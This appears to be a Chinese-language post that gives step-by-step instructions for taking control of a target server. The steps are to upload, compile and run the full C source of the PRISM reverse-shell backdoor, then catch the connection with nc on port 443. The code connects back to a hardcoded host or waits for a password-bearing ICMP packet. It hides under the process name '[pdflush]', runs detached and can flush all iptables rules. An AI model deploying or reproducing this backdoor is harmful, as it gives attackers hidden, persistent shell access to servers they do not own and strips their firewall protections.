1、在目标服务上传c文件
2、编译gcc -DDETACH -DSTATIC -Wall -s -o testtest.c
3、客户端启动nc
4、执行命令–lpv 443
此时已经控制了目标服务器,可在客户端执行linux命令
C源码如下(
# define REVERSE_HOST"192.168.20.19"//客户端ip
# define REVERSE_PORT443//客户端端口
#define PROCESS_NAME"[pdflush]" //启动的进程名
)
/*
* PRISM v0.5
* Reverse Shell Backdoor
*
*by Andrea Fabrizi
*http://www.andreafabrizi.it/?prism
*
*ICMP packet mode (Default):
*The backdoor waits silently for a specific ICMP packet containing
*the host/port (and a security key) to connect.
*
*STATIC mode
*The backdoor try co connect to the specified host/port (REVERSE_HOST/REVERSE_HOST)
*every n seconds (RESPAWN_DELAY).
*
*How to compile:
*gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c
*
*-DDETACH#Run process in background
*-DSTATIC#Enable STATIC mode
*-DNORENAME#Don't rename process
*-DIPTABLES#Try to flush all iptables rules
*
*payload.bin file example:
*p455w0rD 192.168.0.2 5055
*
*nc -l -p 5055
*
*nemesis icmp -i 8 -c 0 -D 192.168.0.1 -P payload.bin
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef STATIC
# define REVERSE_HOST"192.168.20.19"
# define REVERSE_PORT443
# define RESPAWN_DELAY15
#else
# define ICMP_PACKET_SIZE 1024
# define ICMP_KEY"p455w0rD"
#endif
#define VERSION"0.5"
#define MOTD"PRISM v"VERSION" started\n\n# "
#define SHELL"/bin/sh"
#define PROCESS_NAME"[pdflush]"
/*
* Start the reverse shell
*/
void start_reverse_shell(char *bd_ip, unsigned short int bd_port)
{
int sd;
struct sockaddr_in serv_addr;
struct hostent *server;
/* socket() */
sd = socket(AF_INET, SOCK_STREAM, 0);
if (sd < 0)
return;
server = gethostbyname(bd_ip);
if (server == NULL)
return;
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
serv_addr.sin_port = htons(bd_port);
/* connect() */
if (connect(sd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0)
return;
/* motd */
write(sd, MOTD, strlen(MOTD));
/* connect the socket to sdout,stdin and stderr of this process */
dup2(sd, 0);
dup2(sd, 1);
dup2(sd, 2);
/* running the shell */
execl(SHELL, SHELL, (char *)0);
close(sd);
}
/*
* Try to flush all iptables rules
* You can embed here any command you want to be executed from the backdoor :)
*/
#ifdef IPTABLES
void flush_iptables(void)
{
system("iptables -X 2> /dev/null");
system("iptables -F 2> /dev/null");
system("iptables -t nat -F 2> /dev/null");
system("iptables -t nat -X 2> /dev/null");
system("iptables -t mangle -F 2> /dev/null");
system("iptables -t mangle -X 2> /dev/null");
system("iptables -P INPUT ACCEPT 2> /dev/null");
system("iptables -P FORWARD ACCEPT 2> /dev/null");
system("iptables -P OUTPUT ACCEPT 2> /dev/null");
}
#endif
/*
* ICMP packet mode
*/
#ifndef STATIC
void icmp_listen(void)
{
int sockfd,
n,
icmp_key_size;
char buf[ICMP_PACKET_SIZE + 1];
struct icmp *icmp;
struct ip *ip;
icmp_key_size = strlen(ICMP_KEY);
sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
/*
* Waiting for the activation ICMP packet
*/
while (1) {
/* get the icmp packet */
bzero(buf, ICMP_PACKET_SIZE + 1);
n = recv(sockfd, buf, ICMP_PACKET_SIZE,0);
if (n > 0) {
ip = (struct ip *)buf;
icmp = (struct icmp *)(ip + 1);
/* If this is an ICMP_ECHO packet and if the KEY is correct*/
if ((icmp->icmp_type == ICMP_ECHO) && (memcmp(icmp->icmp_data,ICMP_KEY, icmp_key_size) == 0)) {
char bd_ip[16];
int bd_port;
bd_port = 0;
bzero(bd_ip, sizeof(bd_ip));
sscanf((char *)(icmp->icmp_data + icmp_key_size + 1), "%15s %d", bd_ip, &bd_port);
if ((bd_port <= 0) || (strlen(bd_ip) < 7))
continue;
/* Starting reverse shell */
if (fork() == 0) {
#ifdef IPTABLES
flush_iptables();
#endif
//printf("->Starting reverse shell (%s:%d)...\n", bd_ip, bd_port);
start_reverse_shell(bd_ip, bd_port);
exit(EXIT_SUCCESS);
}
}
}
}
}
#endif
/*
* main ()
*/
int main(int argc, char *argv[])
{
signal(SIGCLD, SIG_IGN); //Prevent child process from becoming zombie process
chdir("/");
/* If argv is equal to Inf0, some info will be printed
* In this way the "Inf0" string will not be seen in clear text into the binary file :)
*/
if ((argc == 2) && (argv[1][0] == 'I') && (argv[1][1] == 'n') && (argv[1][2] == 'f') && (argv[1][3] == '0')) {
fprintf(stdout, " Version:\t\t%s\n"
,VERSION);
#ifdef STATIC
fprintf(stdout, " Mode:\t\t\tstatic\n"
" Host:\t\t\t%s\n"
" Port:\t\t\t%d\n"
" Respawn Delay:\t\t%d sec\n"
,REVERSE_HOST, REVERSE_PORT, RESPAWN_DELAY);
#else
fprintf(stdout, " Mode:\t\t\ticmp\n"
" Key:\t\t\t%s\n"
,ICMP_KEY);
#endif
#ifndef NORENAME
fprintf(stdout, " Process name:\t\t%s\n", PROCESS_NAME);
#endif
fprintf(stdout, " Shell:\t\t\t%s\n", SHELL);
#ifdef DETACH
fprintf(stdout, " Detach:\t\tYes\n");
#else
fprintf(stdout, " Detach:\t\tNo\n");
#endif
#ifdef IPTABLES
fprintf(stdout, " Flush Iptables:\tYes\n");
#else
fprintf(stdout, " Flush Iptables:\tNo\n");
#endif
exit(EXIT_SUCCESS);
}
#ifndef NORENAME
int i;
/* Renaming the process */
strncpy(argv[0], PROCESS_NAME, strlen(argv[0]));
for (i=1; i
memset(argv[i],' ', strlen(argv[i]));
#endif
#ifdef DETACH
if (fork() != 0)
exit(EXIT_SUCCESS);
#endif
#ifdef STATIC
while (1) {
#ifdef IPTABLES
flush_iptables();
#endif
/* Starting reverse shell */
if (fork() == 0) {
start_reverse_shell(REVERSE_HOST, REVERSE_PORT);
exit(EXIT_SUCCESS);
}
sleep(RESPAWN_DELAY);
}
#else
/* We need root privilegies to read ICMP packets! */
if (getgid() != 0) {
fprintf(stdout, "I'm not root :(\n");
exit(EXIT_FAILURE);
}
icmp_listen();
#endif
return EXIT_SUCCESS;
}